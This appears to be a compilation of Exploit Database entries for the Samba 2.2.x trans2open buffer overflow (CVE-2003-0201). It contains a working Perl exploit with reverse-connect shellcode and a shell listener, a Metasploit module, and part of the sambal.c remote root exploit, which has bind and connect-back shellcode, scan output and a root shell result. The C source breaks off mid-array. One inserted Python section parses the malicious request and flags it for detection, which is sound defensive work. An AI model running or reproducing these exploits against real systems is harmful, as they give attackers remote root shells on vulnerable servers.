"fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86],
# name # default # start # end # step # function
);
getopt('t:M:h:p:r:H:P:', \%args);
my $target_type = $args{t} || Usage();
my $target_host = $args{h} || Usage();
my $local_host = $args{H} || Usage();
my $local_port = $args{P} || 1981;
my $target_port = $args{p} || 139;
my $target_mode = "brute";
if (! exists($targets{$target_type})) { Usage(); }
print "[*] Using target type: $target_type\n";
# allow single mode via the -M option
if ($args{M} && uc($args{M}) eq "S")
{
$target_mode = "single";
}
# the parent process listens for an incoming connection
# the child process handles the actual exploitation
my $listen_pid = $$;
my $exploit_pid = StartListener($local_port);
# get the default return address for single mode
my $targ_ret = $args{r} || $targets{$target_type}->[0];
my $curr_ret;
$targ_ret = eval($targ_ret);
if ($target_mode !~ /brute|single/)
{
print "[*] Invalid attack mode: $target_mode (single or brute only)\n";
exit(0);
}
if ($target_mode eq "single")
{
$curr_ret = $targ_ret;
if(! $targ_ret)
{
print "[*] Invalid return address specified!\n";
kill("USR2", $listen_pid);
exit(0);
}
print "[*] Starting single shot mode...\n";
printf ("[*] Using return address of 0x%.8x\n", $targ_ret);
my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret);
my $ret = AttemptExploit($target_host, $target_port, $buf);
sleep(2);
kill("USR2", $listen_pid);
exit(0);
}
if ($target_mode eq "brute")
{
print "[*] Starting brute force mode...\n";
for (
$curr_ret =$targets{$target_type}->[1];
$curr_ret >= $targets{$target_type}->[2];
$curr_ret -=$targets{$target_type}->[3]
)
{
select(STDOUT); $|++;
my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret);
printf (" \r[*] Return Address: 0x%.8x", $curr_ret);
my $ret = AttemptExploit($target_host, $target_port, $buf);
}
sleep(2);
kill("USR2", $listen_pid);
exit(0);
}
sub Usage {
print STDERR "\n";
print STDERR " trans2root.pl - Samba 2.2.x 'trans2open()' Remote Exploit\n";
print STDERR "===================================\n\n";
print STDERR " Usage: \n";
print STDERR " $0 <options> -t <target type> -H <your ip> -h <target ip>\n";
print STDERR " Options: \n";
print STDERR " -M (S|B) <single or brute mode>\n";
print STDERR " -r <return address for single mode>\n";
print STDERR " -p <alternate Samba port>\n";
print STDERR " -P <alternate listener port>\n";
print STDERR " Targets:\n";
foreach my $type (keys(%targets))
{
print STDERR " $type\n";
}
print STDERR "\n";
exit(1);
}
sub StartListener {
my ($local_port) = @_;
my $listen_pid = $$;
my $s = IO::Socket::INET->new (
Proto => "tcp",
LocalPort => $local_port,
Type => SOCK_STREAM,
Listen => 3,
ReuseAddr => 1
);
if (! $s)
{
print "[*] Could not start listener: $!\n";
exit(0);
}
print "[*] Listener started on port $local_port\n";
my $exploit_pid = fork();
if ($exploit_pid)
{
my $victim;
$SIG{USR2} = \&GoAway;
while ($victim = $s->accept())
{
kill("USR2", $exploit_pid);
print STDOUT "\n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "\n\n";
StartShell($victim);
}
exit(0);
}
return ($exploit_pid);
}
sub StartShell {
my ($client) = @_;
my $sel = IO::Select->new();
Unblock(*STDIN);
Unblock(*STDOUT);
Unblock($client);
select($client); $|++;
select(STDIN); $|++;
select(STDOUT); $|++;
$sel->add($client);
$sel->add(*STDIN);
print $client "echo \\-\\-\\=\\[ Welcome to `hostname` \\(`id`\\)\n";
print $client "echo \n";
while (fileno($client))
{
my $fd;
my @fds = $sel->can_read(0.2);
foreach $fd (@fds)
{
my @in = <$fd>;
if(! scalar(@in)) { next; }
if (! $fd || ! $client)
{
print "[*] Closing connection.\n";
close($client);
exit(0);
}
if ($fd eq $client)
{
print STDOUT join("", @in);
} else {
print $client join("", @in);
}
}
}
close ($client);
}
sub AttemptExploit {
my ($Host, $Port, $Exploit) = @_;
my $res;
my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type => SOCK_STREAM, Protocol => "tcp");
if (! $s)
{
print "\n[*] Error: could not connect: $!\n";
kill("USR2", $listen_pid);
exit(0);
}
select($s); $|++;
select(STDOUT); $|++;
Unblock($s);
my $SetupSession =
"\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x08".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01".
"\x00\x00\x00\x00";
my $TreeConnect =
"\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00".
"\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24".
"\x25\x6e\x6f\x62\x6f\x64\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50".
"\x43\x24";
my $Flush = ("\x00" x 808);
print $s $SetupSession;
$res = ReadResponse($s);
print $s $TreeConnect;
$res = ReadResponse($s);
# uncomment this for diagnostics
#print "[*] Press Enter to Continue...\n";
#$res = <STDIN>;
#print "[*] Sending Exploit Buffer...\n";
print $s $Exploit;
print $s $Flush;
ReadResponse($s);
close($s);
}
sub CreateBuffer_linx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
$RetAddr = pack("l", $RetAddr);
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the trans2open overflow
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
GetNops(772) .
# xor decoder courtesy of hsj
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
"\x93\x40\xe2\xfa".
# reverse-connect, mangled lamagra code + fixes
"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b".
"\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a".
"\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d".
$p1.$p2 ."\x54\xd6\x63". $a1.$a2.$a3.$a4.
"\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67".
"\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e".
"\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b".
"\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60".
"\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa".
"\xfd\xbc\xe0\xfb".
GetNops(87).
($RetAddr x 8).
"DDI!". ("\x00" x 277);
return $exploit;
}
sub CreateBuffer_solx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
my $IckAddr = $RetAddr - 512;
$RetAddr = pack("l", $RetAddr);
$IckAddr = pack("l", $IckAddr);
# IckAddr needs to point to a writable piece of memory
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the trans2open overflow
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
GetNops(813) .
# xor decoder courtesy of hsj
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
"\x93\x40\xe2\xfa".
# reverse-connect, code by bighawk
"\x2b\x6c\x6b\x6c\xaf\x64\x43\xc3\xa2\x53\x23\x09\xc3\x1a\x76\xa2".
"\x5a\xc2\xd2\xd2\xc2\xc2\x23\x75\x6c\x46\xa2\x41\x1a\x54\xfb".
$a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
"\xf5\xc2\x1a\x75\xf9\x83\xc5\xc4\x23\x78\x6c\x46\xa2\x41\x21\x9a".
"\xc2\xc1\xc4\x23\xad\x6c\x46\xda\xea\x61\xc3\xfb\xbc\xbc\xe0\xfb".
"\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc3\xc0\x1a\x71\xc3\xc1\xc0\x23\xa8".
"\x6c\x46".
GetNops(87) .
"010101".
$RetAddr.
$IckAddr.
$RetAddr.
$IckAddr.
"101010".
"DDI!". ("\x00" x 277);
return $exploit;
}
sub CreateBuffer_bsdx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
my $IckAddr = $RetAddr - 512;
$RetAddr = pack("l", $RetAddr);
$IckAddr = pack("l", $IckAddr);
# IckAddr needs to point to a writable piece of memory
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the trans2open overflow
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
GetNops(830) .
# xor decoder courtesy of hsj
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
"\x93\x40\xe2\xfa".
# reverse-connect, code by bighawk
"\xa2\x5a\x64\x72\xc2\xd2\xc2\xd2\xc2\xc2\x23\xf2\x5e\x13\x1a\x50".
"\xfb". $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
"\xf5\xc2\x1a\x75\x21\x83\xc1\xc5\xc3\xc3\x23\xf1\x5e\x13\xd2\x23".
"\xc9\xda\xc2\xc0\xc0\x5e\x13\xd2\x71\x66\xc2\xfb\xbc\xbc\xe0\xfb".
"\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc2\xc7\xc0\xc0\x23\xa8\x5e\x13".
GetNops(87) .
"010101".
$RetAddr.
$IckAddr.
$RetAddr.
$IckAddr.
"101010".
"DDI!". ("\x00" x 277);
return $exploit;
}
sub Unblock {
my $fd = shift;
my $flags;
$flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
}
sub GoAway {
exit(0);
}
sub ReadResponse {
my ($s) = @_;
my $sel = IO::Select->new($s);
my $res;
my @fds = $sel->can_read(4);
foreach (@fds) { $res .= <$s>; }
return $res;
}
sub HexDump {
my ($data) = @_;
my @x = split(//, $data);
my $cnt = 0;
foreach my $h (@x)
{
if ($cnt > 16)
{
print "\n";
$cnt = 0;
}
printf("\\x%.2x", ord($h));
$cnt++;
}
print "\n";
}
# thank you k2 ;)
sub GetNops {
my ($cnt) = @_;
my @nops = split(//,"\x99\x96\x97\x95\x93\x91\x90\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97".
"\x46\x4e\xf8\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b".
"\xf5\x45\x4c");
return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]);
}
# milw0rm.com [2003-04-07]
Exploit Database EDB-ID : 16861
Publication date: 2010-07-13 22:00 +00:00
Author: Metasploit
EDB Verified: Yes
##
# $Id: trans2open.rb 9828 2010-07-14 17:27:23Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SMB
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba trans2open Overflow (Linux x86)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the flaw on x86 Linux systems that do not
have the noexec stack option set.
NOTE: Some older versions of RedHat do not seem to be vulnerable
since they apparently do not allow anonymous access to IPC.
},
'Author' => [ 'hdm', 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9828 $',
'References' =>
[
[ 'CVE', '2003-0201' ],
[ 'OSVDB', '4469' ],
[ 'BID', '7294' ],
[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
'StackAdjustment' => -3500
},
'Platform' => 'linux',
'Targets' =>
[
# tested OK - jjd:
# RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc
# RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc
[ 'Samba 2.2.x - Bruteforce',
{
'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
'Offset' => 1055,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbffffdfc },
'Stop' => { 'Ret' => 0xbfa00000 },
'Step' => 256
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 7 2003'
))
register_options(
[
Opt::RPORT(139)
], self.class)
end
def brute_exploit(addrs)
curr_ret = addrs['Ret']
begin
print_status("Trying return address 0x%.8x..." % curr_ret)
connect
smb_login
if ! @checked_peerlm
if smb_peer_lm !~ /samba/i
raise RuntimeError, "This target is not a Samba server (#{smb_peer_lm})"
end
if smb_peer_lm =~ /Samba [34]\./i
raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})"
end
end
@checked_peerlm = true
# This value *must* be 1988 to allow findrecv shellcode to work
# XXX: I'm not sure the above comment is true...
pattern = rand_text_english(1988)
# See the OSX and Solaris versions of this module for additional
# information.
# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
# (rpmbuild -bp ; edited/reran config.status ; make)
eip_off = target['Offset']
ptr_to_non_zero = target['PtrToNonZero']
# Stuff the shellcode into the request
pattern[0, payload.encoded.length] = payload.encoded
# We want test true here, so we overwrite conn with a pointer
# to something non-zero.
#
# 222 if (IS_IPC(conn)) {
# 223 return(ERROR(ERRSRV,ERRaccess));
# 224 }
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
# We want to avoid crashing on the following two dereferences.
#
# 116 int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)
# 117 {
# 118 int outsize = set_message(outbuf,0,0,True);
# 119 int cmd = CVAL(inbuf,smb_com);
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
# This stream covers the framepointer and the return address
#pattern[1199, 400] = [curr_ret].pack('N') * 100
pattern[eip_off, 4] = [curr_ret].pack('V')
trans =
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
pattern
# puts "press any key"; $stdin.gets
sock.put(trans)
handler
rescue ::EOFError
rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError
raise $!
rescue ::Exception => e
print_error("#{rhost} #{e}")
end
handler
disconnect
end
end
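The 96 header bytes the module sends (the `trans` string above) decode as a NetBIOS session message carrying an SMB_COM_TRANSACTION2 request whose single setup word selects TRANS2_OPEN2 and whose parameter count is 2000 bytes, far more than an open request needs. The parser and check below are an added example written from the detection side; they are not code from the Metasploit module or from Samba. They decode those fixed offsets and flag a TRANS2_OPEN2 whose parameter block exceeds a threshold. The threshold value, the 1988-byte filler standing in for the module's random pattern, and the benign request builder are assumptions made here for illustration.

```python
"""Parser and detection check for SMB_COM_TRANSACTION2 / TRANS2_OPEN2 requests.

Added example for this page; not code from the Metasploit module or from Samba.
The trigger header below is the one the module sends; the filler after it is
constructed here in place of the module's rand_text_english(1988).
"""
import struct

SMB_COM_TRANSACTION2 = 0x32
TRANS2_OPEN2 = 0x0000

# Assumed threshold (not a Samba constant): a TRANS2_OPEN2 parameter block is a
# short fixed prefix followed by one pathname, and Samba's pathname buffers
# (pstring) hold 1024 bytes, so a larger block cannot be a legitimate open.
MAX_SANE_OPEN2_PARAMS = 1024

# First 96 bytes of the request as sent by the module above: NBT session header,
# SMB header, the fourteen TRANSACTION2 words, one setup word, byte count, padding.
TRIGGER_HEADER = (
    b"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
    b"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"
)
# Constructed filler: the module's 1988 random bytes replaced by a fixed pattern.
TRANS2OPEN_SAMPLE = TRIGGER_HEADER + b"A" * 1988

# vwv0..vwv13 of a TRANSACTION2 request (CIFS layout), 28 bytes little-endian.
TRANS2_WORDS = "<HHHHBBHIHHHHHBB"


def parse_trans2(pkt: bytes) -> dict:
    """Decode the NBT framing, the SMB header and, for SMB_COM_TRANSACTION2,
    the request words. Raises ValueError on truncated or non-SMB input."""
    if len(pkt) < 4 or pkt[0] != 0x00:
        raise ValueError("not an NBT session message")
    # The NBT length is 17 bits: the low bit of the flags byte extends it.
    nbt_len = ((pkt[1] & 0x01) << 16) | struct.unpack(">H", pkt[2:4])[0]
    smb = pkt[4:]
    if len(smb) < nbt_len:
        raise ValueError("NBT length exceeds captured data")
    if len(smb) < 33 or smb[:4] != b"\xffSMB":
        raise ValueError("missing SMB header")
    tid, pid, uid, mid = struct.unpack("<HHHH", smb[24:32])
    fields = {"nbt_len": nbt_len, "command": smb[4], "tid": tid, "pid": pid,
              "uid": uid, "mid": mid, "wct": smb[32], "setup": []}
    if fields["command"] != SMB_COM_TRANSACTION2:
        return fields
    # The trigger carries wct=0 yet uses all fourteen words, so the words are
    # read at their fixed offsets and wct is reported but not trusted.
    if len(smb) < 61:
        raise ValueError("truncated TRANSACTION2 words")
    (tpscnt, tdscnt, mprcnt, mdrcnt, msrcnt, _r1, flags, timeout, _r2,
     pscnt, psoff, dscnt, dsoff, suwcnt, _r3) = struct.unpack(TRANS2_WORDS, smb[33:61])
    if len(smb) < 61 + 2 * suwcnt:
        raise ValueError("truncated setup words")
    setup = list(struct.unpack("<%dH" % suwcnt, smb[61:61 + 2 * suwcnt]))
    fields.update(tpscnt=tpscnt, tdscnt=tdscnt, mprcnt=mprcnt, mdrcnt=mdrcnt,
                  msrcnt=msrcnt, flags=flags, timeout=timeout, pscnt=pscnt,
                  psoff=psoff, dscnt=dscnt, dsoff=dsoff, suwcnt=suwcnt, setup=setup)
    return fields


def is_trans2open_overflow(pkt: bytes) -> bool:
    """True when pkt is a TRANS2_OPEN2 whose parameter block is larger than
    any legitimate open could need (MAX_SANE_OPEN2_PARAMS)."""
    f = parse_trans2(pkt)
    if f["command"] != SMB_COM_TRANSACTION2 or not f["setup"]:
        return False
    if f["setup"][0] != TRANS2_OPEN2:
        return False
    return max(f["tpscnt"], f["pscnt"]) > MAX_SANE_OPEN2_PARAMS


def build_trans2_open_request(params: bytes) -> bytes:
    """Constructed helper: frame a well-formed TRANS2_OPEN2 request carrying the
    given parameter block, laid out like the trigger (ParameterOffset 67)."""
    hdr = (b"\xffSMB" + bytes([SMB_COM_TRANSACTION2]) + b"\x00" * 4   # status
           + b"\x00" + b"\x00\x00" + b"\x00" * 12                        # flags, flags2, pad
           + struct.pack("<HHHH", 1, 0, 100, 0))                         # tid, pid, uid, mid
    psoff = 32 + 1 + 28 + 2 + 2 + 2   # header, wct, words, setup, bcc, two pad bytes
    words = struct.pack(TRANS2_WORDS, len(params), 0, 0, 0, 0, 0, 0, 0, 0,
                        len(params), psoff, 0, psoff + len(params), 1, 0)
    body = bytes([15]) + words + struct.pack("<H", TRANS2_OPEN2)
    body += struct.pack("<H", 2 + len(params)) + b"\x00\x00" + params
    smb = hdr + body
    return (b"\x00" + bytes([(len(smb) >> 16) & 1])
            + struct.pack(">H", len(smb) & 0xFFFF) + smb)
```

On the trigger bytes the parser yields tpscnt = pscnt = 2000, psoff = 67, dsoff = 2068 and setup[0] = 0, which is what a network signature for this overflow keys on. The request also carries a word count of 0 while using all fourteen TRANSACTION2 words, so a decoder that trusts wct skips exactly the fields it needs to inspect.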
Exploit Database EDB-ID : 10
Publication date: 2003-04-09 22:00 +00:00
Author: eSDee
EDB Verified: Yes
/*
Remote root exploit for Samba 2.2.x and prior that works against
Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and
OpenBSD (2.x, 3.x and 3.2 non-executable stack).
sambal.c is able to identify samba boxes. It will send a netbios
name packet to port 137. If the box responds with the mac address
00-00-00-00-00-00, it's probably running samba.
[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Scan mode.
+ [192.168.0.3] Samba
+ [192.168.0.10] Windows
+ [192.168.0.20] Windows
+ [192.168.0.21] Samba
+ [192.168.0.30] Windows
+ [192.168.0.31] Samba
+ [192.168.0.33] Windows
+ [192.168.0.35] Windows
+ [192.168.0.36] Windows
+ [192.168.0.37] Windows
...
+ [192.168.0.133] Samba
Great!
You could now try a preset (-t0 for a list), but most of the
time bruteforce will do. The smbd spawns a new process on every
connect, so we can bruteforce the return address...
[esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Using ret: [0xbffffa24]
+ Using ret: [0xbffff8f8]
+ Using ret: [0xbffff7cc]
+ Worked!
--------------------------------------------------------------
Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586
i586 i386 GNU/Linux
uid=0(root) gid=0(root) groups=99(nobody)
sambal.c : samba-2.2.8 < remote root exploit by eSDee (www.netric.org|
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
typedef struct {
unsigned char type;
unsigned char flags;
unsigned short length;
} NETBIOS_HEADER;
typedef struct {
unsigned char protocol[4];
unsigned char command;
unsigned short status;
unsigned char reserved;
unsigned char flags;
unsigned short flags2;
unsigned char pad[12];
unsigned short tid;
unsigned short pid;
unsigned short uid;
unsigned short mid;
} SMB_HEADER;
int OWNED = 0;
pid_t childs[100];
struct sockaddr_in addr1;
struct sockaddr_in addr2;
char linux_bindcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
"\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
"\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
"\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
"\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
"\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
char bsd_bindcode[] =
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"
"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"
"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"
"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
"\xeb\x9a";
char linux_connect_back[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
